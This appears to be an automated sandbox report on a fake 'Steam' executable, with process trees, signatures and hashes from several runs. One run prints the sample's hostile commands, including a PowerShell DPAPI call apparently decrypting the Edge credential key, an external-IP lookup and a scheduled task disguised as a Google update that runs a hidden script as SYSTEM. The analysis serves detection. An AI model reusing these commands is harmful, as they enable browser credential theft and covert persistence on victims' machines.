Analysis Overview
SHA256
c8b514c3f087a82fe2d755bc65404e59e14a45fb9c737e08eeccb8f89cf74a62
Threat Level: Shows suspicious behavior
The file Steam_6n0hahx7.exe was found to show suspicious behavior.
Malicious Activity Summary
Loads dropped DLL
Reads user/profile data of web browsers
Looks up external IP address via web service
An obfuscated cmd.exe command-line is typically used to evade detection.
Program crash
Unsigned PE
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates processes with tasklist
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-07 19:45
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-07 19:44
Reported
2024-04-07 19:48
Platform
win11-20240221-en
Max time kernel
141s
Max time network
156s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2380 wrote to memory of 1524 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2380 wrote to memory of 1524 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2380 wrote to memory of 1524 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1524 -ip 1524
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1524 -s 536
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-04-07 19:44
Reported
2024-04-07 19:48
Platform
win11-20240221-en
Max time kernel
147s
Max time network
159s
Command Line
Signatures
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\LICENSES.chromium.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb74663cb8,0x7ffb74663cc8,0x7ffb74663cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1872,16594337270489061659,16855143672689735641,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1928 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1872,16594337270489061659,16855143672689735641,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2360 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1872,16594337270489061659,16855143672689735641,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,16594337270489061659,16855143672689735641,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,16594337270489061659,16855143672689735641,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,16594337270489061659,16855143672689735641,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4512 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,16594337270489061659,16855143672689735641,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1872,16594337270489061659,16855143672689735641,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3228 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,16594337270489061659,16855143672689735641,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,16594337270489061659,16855143672689735641,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1872,16594337270489061659,16855143672689735641,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5428 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1872,16594337270489061659,16855143672689735641,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5344 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | f2dc80f5403feb8461b7ffa09890d6a0 |
| SHA1 | d5b61e6d672e7e71571e0132e21cead181da8805 |
| SHA256 | eadeadba37eed18e5acba408d7e076270b00403fed372b77164577232232428a |
| SHA512 | 5e2119529b99b76be105c43714e4b9977ee2147172c1c44e92bd9b41fa7a66f55d4073c864aac668a912aff2898bd216fb38f2fe34ef65de69ad12965218caf5 |
\??\pipe\LOCAL\crashpad_4476_JHRTWPPTEDYDPOFR
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 5c48e8b68231fb5b2d7f1188b930bc0e |
| SHA1 | 1822aef5da8fdd47626fb91afcf79a2be175a325 |
| SHA256 | c3b287c29eaa57166b2ab1ba9bd0aaced13cc2f946a04b8d708ac429187fe944 |
| SHA512 | 2bd09b83e44e0104fbe080a8573690217dc9fbf7fd59ff25a1a9e9ebd2d87ac533f9b99350773d081a7e748b39657115a13e94538b153bceb13ecdfc4672a0f8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d50fab4f191f0582ba580bd8c2ec6636 |
| SHA1 | 7ed0a80d9d43630f59b88508663dc21d5b38b5a0 |
| SHA256 | 25bcc9b5dd1216e6a855b874b2e28fdf3d7e3bab4490e6e22d839c6f8d728cbe |
| SHA512 | 23eb4c0a5bf579993472d63fb3bc09d6e1575142cdac8c6bd8dd97166cf811060d62cf3df4bc9e3ba8f771ecefc8fa8144674719c934072b8ddfb6b36a176c3d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | b3b3b827849457196cb3f397b0443645 |
| SHA1 | 92e6daa8f371d741582e32f12d4ccad8c0e1457a |
| SHA256 | 01636fae3192485dacc97b07293bd30e9cef95b016b0117f3d4f6eb018c6b728 |
| SHA512 | 108e9986e2e3da6a4d47218637435625ff2513105bfc7a5c960f53a5607ed3ae3a7a2f334bd9e017de4a84b80c000835dbfb635666a45b3ea69f1185b1ee8d85 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f32a1636fd775617d65fcf35e84c5d0a |
| SHA1 | 6bc6a2953d66d39a4bf8c60a6f8b8fa5bac0473f |
| SHA256 | fc411ca391d91cd2c3012f8c2e4fed1a0a9726ab350bb7ca8447ba3259c8f8b7 |
| SHA512 | 0eb37af5c3c59e95d1a61af2d6ac3e3efb0897bb0720eeebf82f31197e14bd1c890d88f53b272a646011d47d5c2af99be8ab70c5d2cd2f872c7196e559dbccdc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
Analysis: behavioral8
Detonation Overview
Submitted
2024-04-07 19:44
Reported
2024-04-07 19:48
Platform
win11-20240214-en
Max time kernel
85s
Max time network
91s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-04-07 19:44
Reported
2024-04-07 19:48
Platform
win11-20240221-en
Max time kernel
146s
Max time network
155s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe
"C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-04-07 19:44
Reported
2024-04-07 19:48
Platform
win11-20240221-en
Max time kernel
28s
Max time network
52s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2332 wrote to memory of 5064 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2332 wrote to memory of 5064 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2332 wrote to memory of 5064 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5064 -ip 5064
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 460
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-04-07 19:44
Reported
2024-04-07 19:48
Platform
win11-20240221-en
Max time kernel
86s
Max time network
96s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\d3dcompiler_47.dll,#1
Network
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-04-07 19:44
Reported
2024-04-07 19:49
Platform
win11-20240221-en
Max time kernel
141s
Max time network
162s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ffmpeg.dll,#1
Network
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-04-07 19:44
Reported
2024-04-07 19:48
Platform
win11-20240221-en
Max time kernel
28s
Max time network
142s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4704 wrote to memory of 3632 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4704 wrote to memory of 3632 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4704 wrote to memory of 3632 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3632 -ip 3632
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 468
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-07 19:44
Reported
2024-04-07 19:46
Platform
win11-20240221-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-04-07 19:44
Reported
2024-04-07 19:48
Platform
win11-20240221-en
Max time kernel
150s
Max time network
155s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libGLESv2.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | N/A | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-04-07 19:44
Reported
2024-04-07 19:48
Platform
win11-20240221-en
Max time kernel
4s
Max time network
10s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Steam.exe | N/A |
Reads user/profile data of web browsers
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Steam.exe
"C:\Users\Admin\AppData\Local\Temp\Steam.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,1,230,209,96,183,3,147,71,187,153,213,196,88,17,142,74,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,142,201,190,236,119,164,249,229,41,6,194,37,239,167,184,163,113,143,87,88,255,118,110,201,100,66,207,20,108,252,227,68,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,117,182,249,61,2,159,110,24,25,13,161,36,186,14,75,78,120,216,53,125,15,64,189,193,186,132,116,79,103,202,186,94,48,0,0,0,152,140,232,44,188,166,20,101,3,247,171,153,99,3,74,178,253,152,73,92,23,31,142,140,189,199,211,146,124,26,26,111,64,189,223,72,118,238,118,127,166,126,39,230,8,162,176,235,64,0,0,0,180,244,68,231,242,166,178,241,72,22,15,194,14,178,91,91,84,8,166,233,155,101,48,41,247,47,79,140,45,53,245,186,235,199,214,238,172,241,176,13,60,70,213,189,216,77,98,203,211,240,139,15,138,215,20,227,41,204,192,211,179,39,141,8), $null, 'CurrentUser')"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,1,230,209,96,183,3,147,71,187,153,213,196,88,17,142,74,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,142,201,190,236,119,164,249,229,41,6,194,37,239,167,184,163,113,143,87,88,255,118,110,201,100,66,207,20,108,252,227,68,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,117,182,249,61,2,159,110,24,25,13,161,36,186,14,75,78,120,216,53,125,15,64,189,193,186,132,116,79,103,202,186,94,48,0,0,0,152,140,232,44,188,166,20,101,3,247,171,153,99,3,74,178,253,152,73,92,23,31,142,140,189,199,211,146,124,26,26,111,64,189,223,72,118,238,118,127,166,126,39,230,8,162,176,235,64,0,0,0,180,244,68,231,242,166,178,241,72,22,15,194,14,178,91,91,84,8,166,233,155,101,48,41,247,47,79,140,45,53,245,186,235,199,214,238,172,241,176,13,60,70,213,189,216,77,98,203,211,240,139,15,138,215,20,227,41,204,192,211,179,39,141,8), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,1,230,209,96,183,3,147,71,187,153,213,196,88,17,142,74,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,134,57,53,184,109,103,87,41,96,93,54,175,83,254,108,1,199,63,183,145,59,67,77,142,131,41,66,140,251,225,30,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,50,139,195,109,157,54,95,31,122,27,243,129,91,106,56,19,120,167,108,199,123,190,180,44,26,193,243,188,5,249,100,159,48,0,0,0,79,190,164,90,47,210,54,200,237,40,110,74,250,111,141,178,90,89,142,131,113,94,149,123,17,190,228,107,254,66,96,184,159,117,236,86,51,7,28,128,111,234,232,223,185,23,255,90,64,0,0,0,60,144,165,167,84,157,208,17,93,60,160,32,92,249,63,246,132,77,226,246,5,218,17,205,23,195,165,110,254,55,95,129,234,6,241,102,134,123,200,151,222,54,233,191,21,50,221,233,126,250,119,218,52,59,70,62,8,46,61,164,64,24,209,159), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,1,230,209,96,183,3,147,71,187,153,213,196,88,17,142,74,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,134,57,53,184,109,103,87,41,96,93,54,175,83,254,108,1,199,63,183,145,59,67,77,142,131,41,66,140,251,225,30,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,50,139,195,109,157,54,95,31,122,27,243,129,91,106,56,19,120,167,108,199,123,190,180,44,26,193,243,188,5,249,100,159,48,0,0,0,79,190,164,90,47,210,54,200,237,40,110,74,250,111,141,178,90,89,142,131,113,94,149,123,17,190,228,107,254,66,96,184,159,117,236,86,51,7,28,128,111,234,232,223,185,23,255,90,64,0,0,0,60,144,165,167,84,157,208,17,93,60,160,32,92,249,63,246,132,77,226,246,5,218,17,205,23,195,165,110,254,55,95,129,234,6,241,102,134,123,200,151,222,54,233,191,21,50,221,233,126,250,119,218,52,59,70,62,8,46,61,164,64,24,209,159), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get serialnumber
C:\Users\Admin\AppData\Local\Temp\Steam.exe
